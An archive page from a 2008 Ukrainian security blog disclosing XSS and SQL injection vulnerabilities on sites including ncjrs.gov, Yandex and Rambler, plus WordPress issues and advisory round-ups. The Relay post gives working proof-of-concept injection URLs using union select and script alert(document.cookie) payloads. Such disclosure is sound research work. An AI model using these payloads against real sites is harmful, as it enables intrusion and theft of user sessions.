Архів для категорії 'Уразливості'

Уразливість на www.ncjrs.gov

20:21 05.05.2008

21.01.2008

У червні, 18.06.2007, я знайшов Cross-Site Scripting уразливість на одному з сайтів міністерства Юстиції США http://www.ncjrs.gov - National Criminal Justice Reference Service. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

05.05.2008

XSS:

Дана XSS в DOM спрацює при кліку на лінки “See all 100 Publications (Full Text)”, “See all 100 Publications (Abstracts Only)”, “See all 100 Federal Justice Web sites”, “See all 62 Q&A”, “See all 37 Related Links”, “Publications (Full Text) (100)”, “Publications (Abstracts Only) (100)”, “Federal Justice Web Sites (100)”, “Q&A (62)”, “Related Links (37)”, “Justice Events (6)”.

Дана уразливість досі не виправлена.

SQL Injection та Cross-Site Scripting уразливості в Relay

23:58 03.05.2008

В січні я вже писав про уразливості в Relay. І сьогодні я розробив експлоіт для SQL Injection уразливості в Relay.

Експлоіт: relay_exploit.txt.

Також сьогодні я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1%20and%20substring(version(),1,1)=3&email=1

XSS:

http://site/relay/relay.php?relay=getFile&fileid=1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20relay_users/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Це XSS через SQL Injection - для гурманів ;-) .

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=and%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=1

Ще одна XSS через SQL Injection :-) .

XSS (Persistent):

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

Добірка уразливостей

17:31 03.05.2008

В даній добірці уразливості в веб додатках:

Уразливості на yandex.ru, images.yandex.ru та market.yandex.ru

20:05 02.05.2008

17.01.2008

У червні, 17.06.2007, я знайшов Cross-Site Scripting уразливості в пошуковій системі Яндекс - на сайтах http://yandex.ru, http://images.yandex.ru та http://market.yandex.ru. Про що найближчим часом сповіщу адміністрацію пошуковця.

Детальна інформація про уразливості з’явиться пізніше.

02.05.2008

XSS:

http://yandex.ru (при кліку на “расширенный поиск”)

http://images.yandex.ru (при кліку на “расширенный поиск”)

http://market.yandex.ru

Дані уразливості вже виправлені, але ще одна так і не була виправлена.

XSS:

http://market.yandex.ru (при кліку на “Вход”)

Добірка уразливостей

16:23 01.05.2008

В даній добірці уразливості в веб додатках:

Cookie Authentication уразливість в WordPress

23:54 30.04.2008

В листопаді минулого року була виявлена Cookie Authentication уразливість в WordPress (про наявність даної особливості роботи з кукісами було відомо й раніше). При наявності доступу до БД можна відтворити кукіс будь-якого користувача системи.

Ця особливість реалізації не є сама по собі небезпечною. Але, при наявності витоку інформації з бази даних, або SQL Injection, вона може бути використана для комплексної атаки на сайт.

Вразливі версії WordPress від 1.5 по 2.3.3. Новий підхід до роботи з кукісами був запроваджений в WordPress 2.5. В якому була виявлена уразливість (причому тим же секюріті дослідником Steven Murdoch) в роботі нового механізму управління кукісами.

  • Wordpress Cookie Authentication Vulnerability (деталі)

Уразливість на www.rambler.ru

20:05 30.04.2008

16.01.2008

У червні, 17.06.2007, я знайшов Cross-Site Scripting уразливість на http://www.rambler.ru - головному сайті компанії Раблер. Про що найближчим часом сповіщу адміністрацію сайта.

Останній раз стосовно уразливостей на Рамблері я писав про уразливості на ftpsearch.rambler.ru.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.04.2008

XSS:

Дана уразливість вже виправлена.

Уразливості в плагінах для WordPress №11

22:47 29.04.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP. До речі, нещодавно я писав про XSS уразливість в плагіні Trashbin.

Цього разу повідомляю про уразливості в плагінах Download та Spreadsheet. Для котрих нещодавно з’явилися експлоіти. Download - це плагін для ведення статистики скачувань файлів, Spreadsheet - це плагін для створення крупноформатних таблиць.

  • Wordpress Plugin Download (dl_id) SQL Injection Vulnerability (деталі)
  • Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:32 29.04.2008

В даній добірці уразливості в веб додатках:

  • pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability (деталі)
  • fipsCMS v2.1 Remote SQL injection Vulnerability (деталі)
  • phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability (деталі)
  • american cart 3.* (abs_path) remote file include (деталі)
  • Advanced Guestbook version 2.4.2 Multiple Error Information Leak Vulnerabilities (деталі)
  • OTRS <= 2.0.x XSS/XSRF (деталі)
  • netbingo v 2000 >> RFI (деталі)
  • HTMLeditbox & 2.2 >> RFI (деталі)
  • HYIP Manager Pro Script >> Remote file Include (деталі)
  • Multiple cross-site scripting (XSS) vulnerabilities in Ublog Reload 1.0.5 (деталі)

Уразливість на www.studio7.com.ua

19:37 28.04.2008

10.01.2008

У червні, 09.06.2007, я знайшов Cross-Site Scripting уразливість на сайті http://www.studio7.com.ua. З дірявими сайтами виробництва даної дизайн студії мені не раз доводилося зустрічатися, а цього разу уразливість на сайті самої студії. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.04.2008

XSS:

Дана уразливість досі не виправлена.